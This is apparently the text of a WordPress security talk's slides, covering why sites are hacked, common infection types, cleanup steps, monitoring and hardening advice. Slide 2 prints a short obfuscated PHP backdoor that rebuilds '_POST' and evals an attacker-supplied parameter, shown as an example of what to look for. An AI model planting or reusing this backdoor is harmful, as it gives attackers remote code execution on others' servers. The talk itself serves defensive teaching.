2. SCHRODINGER’S WEBSITE
You must assume your site is both hacked and not
hacked until you open the box and find out.
<?php
$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].
$qV[0].$qV[1]);if(isset(${$s20}['q53b3a6'])){eval($
{$s20}['q53b3a6']);}?>
3. WordPress Instructor and Custom Theme Developer
Using WordPress Since 2007 —Version 2.2
Not a security expert, but I play one on WordPress.tv
Angela Bowman
Ask WP Girl @askwpgirl
5. WHY DO HACKERS HACK?
Deface sites for fun
Add spammy links to bad web
neighborhoods (SEO spam)
Hijack site to add spam, porn,
gambling, pay-day loans content
Steal sensitive information to sell
Distribute malware to personal
computers
Use server resources for
distributed attacks
6. WHAT DO HACKERS
ACTUALLY DO?
Create admin account
Reset passwords
Inject malicious code into content
Add malicious code to existing files
or new files
Redirect your website
http://www.wpmayor.com/wordpress-security-based-facts-statistics/
Gravity Forms hack
7. WHY SHOULD YOU CARE?
Performance issues
SEO tanks
Blacklisting or Phish Tank
Account closed
Angry customers
8. TYPICALLY, ONLY THE
MOST SEVERELY HACKED
SITES WILL BE
BLACKLISTED OR
SUSPENDED BY HOST
Many hacks are hidden
10. RECENT VULNERABILITIES
Google Analytics WordPress 4.2.1
Backup to Dropbox FancyBox
TwentyFifteen
Revolution SliderGravity Forms
JetPack
Database of all vulnerable plugins and themes: https://wpvulndb.com/
11. LOW HANGING FRUIT
Vulnerabilities immediately published on the web
Hackers write bots to exploit vulnerabilities
Website owners are oblivious: they don’t update, use weak
passwords, install tons of plugins, use not-great web hosting
13. “SPOT THE HACK” GAME
A - Scan Site
B - Look at files on server
C - Find the hacked code
A
B
C
14. 1 - Backdoors
PHP files uploaded to your server and accessed remotely. Severely
affect site and server performance. Not easy to find.
15. IT'S VERY COMMON, THAT
BACKDOORS DON'T HAVE
ANY VISIBLE SIGNS IN THE
SITE CODE AND IT'S
IMPOSSIBLE TO DETECT
THEM BY ACCESSING THE
INFECTED SITE FROM
OUTSIDE. ~ SUCURI
16. 2 - Drive by Downloads
Script injected on website generates links to malware sites or
downloads malware from your site to visitors’ computers.
Easy for scanners to detect.
17. 3 - Pharma Hack
Spam links injected onto web pages only visible to search
engines. Difficult to scan for because cloaked.
https://blog.sucuri.net/2011/02/cleaning-up-an-infected-web-site-part-i-wordpress-and-the-pharma-hack.html
18. 4 - Malicious Redirects
Redirects traffic from your website to another typically by
modifying the .htaccess file, sometimes only when viewed by a
particular device or browser, like a phone
Hacked .htaccess file
19. DIY HACK RECOVERY
Via SFTP (preferred) or FTP
1 Backup:
Download
everything. Good to
examine later for
details of hack if
needed.
2 Delete
all except:
cgi-bin
.htaccess
wp-config.php
(examine these)
3 Upload fresh:
WordPress
Themes
Plugins
cleaned uploads
20. Why are people from
Thailand and Romania
accessing a strangely
named PHP file
somewhere?
Check raw access logs via cPanel
db12.php, css.php, dirs35.php????
MONITORING TIPS
21. Audit Activity on Site
https://wordpress.org/plugins/wp-simple-firewall/
22. Check WordPress core integrity
using Sucuri plugin https://
wordpress.org/plugins/sucuri-
scanner/
Run https://wordpress.org/
plugins/gotmls/ to check
wp-content folder
Look for modified dates,
unusual names, file types
that don’t belong
Compare file list to original
download
Commonly hacked files: .htaccess,
wp-config.php, index.php,
functions.php, header.php
Any file can be hacked!
Finding PHP Back Doors
Hmmmm? PHP in a CSS folder?
23. Finding and Removing Malicious Redirects
Listen to when someone tells you that they tried to
visit your site and couldn’t and find out which browser
or device they were using at the time.
Use http://www.botsvsbrowsers.com/
SimulateUserAgent.asp to verify
Scan with Sucuri’s SiteCheck
Check all the .htaccess files on the server and remove
the redirect.
https://sitecheck.sucuri.net/
24. Use Google Search Console!
Google Webmaster Tools/Search Console
Search Queries – you can spot queries irrelevant to you site.
Links toYour Site – you can find suspicious incoming links here.
Internal Links – this report can help reveal rogue sections of your site.
http://askwpgirl.com/submitting-wordpress-site-google-webmaster-tools/
25. Check for rogue users and posts
Your new admin friends?
Find hidden admin users: http://snipe.net/2010/01/when-wordpress-gets-hacked/
26. IMMEDIATELY CHANGE
PASSWORDS
Use Sucuri plugin to Generate New Security Keys
Reset all passwords, including WordPress
users, FTP, web hosting, control panel
Scan computer for viruses!
27. See http://askwpgirl.com/nuke-it-from-orbit/ for step-by-step elimination
CLEAN UP “BAD” HACK
If hackers got admin access to site or database,
you might have to nuke the entire site from orbit
— it’s the only way to be sure
https://www.youtube.com/watch?v=aCbfMkh940Q
Or contact
sucuri.net for
site clean up and
monitoring
28. REQUEST SITE REVIEW
If Google blacklisted your site or marked it for phishing
scam, you will need to request a review after you are
certain you’ve cleaned up all hacked files:
https://support.google.com/webmasters/answer/
168328?hl=en
30. UPDATE UPDATE UPDATE
Timely updates are critical for security.
Tools: iControlWP, MainWP, InfiniteWP, Jetpack, ManageWP
http://askwpgirl.com/updating-wordpress-plugins-themes-core/
31. SECURE YOUR LOGIN
Online Generator:
http://www.pctools.com/guides/password/
Track Passwords:
http://agilebits.com/products/1Password
Enable Two-Factor Authentication:
http://askwpgirl.com/wordpress-two-factor-
authentication-plugins/
Avoid logging in on
public WiFi Networks
32. RUN A TIGHT SHIP!
Delete ALL unused stuff on server
Only use popular and well-maintained themes and plugins
Don’t allow users to register (Settings > General)
Always hold comments for moderation and use spam
filtering (Akismet plugin)
33. GOOD HOSTING
Correct File Permissions
WordPress Auto Updates
Firewall and Scanning
Regular Backups
Server Security
Performance Optimization
Managed WordPress Hosts:
Site Ground
WP Engine
Get Flywheel
Web Synthesis
Pantheon
34. EFFECTIVE SECURITY
PLUGIN FEATURES
Limit login access
Block bad URL requests
with a Firewall
Audit activity
Security through obscurity is not security
IP addresses don’t matter and should not be used as the
foundation of aWordPress security policy
My favorite security plugin: https://wordpress.org/plugins/wp-simple-firewall/
Does all the above and more.Will notify you of vulnerable plugins.
35. BACKUPS
Common wisdom is to backup your site
Backups are to your site what major medical health
care coverage is to your health
Usually only helpful in case of a disaster
Services:
VaultPress and
WorpDrive good
hosted solutions!
Plugins:
BackupBuddy (paid),
BackWPUp,
Duplicator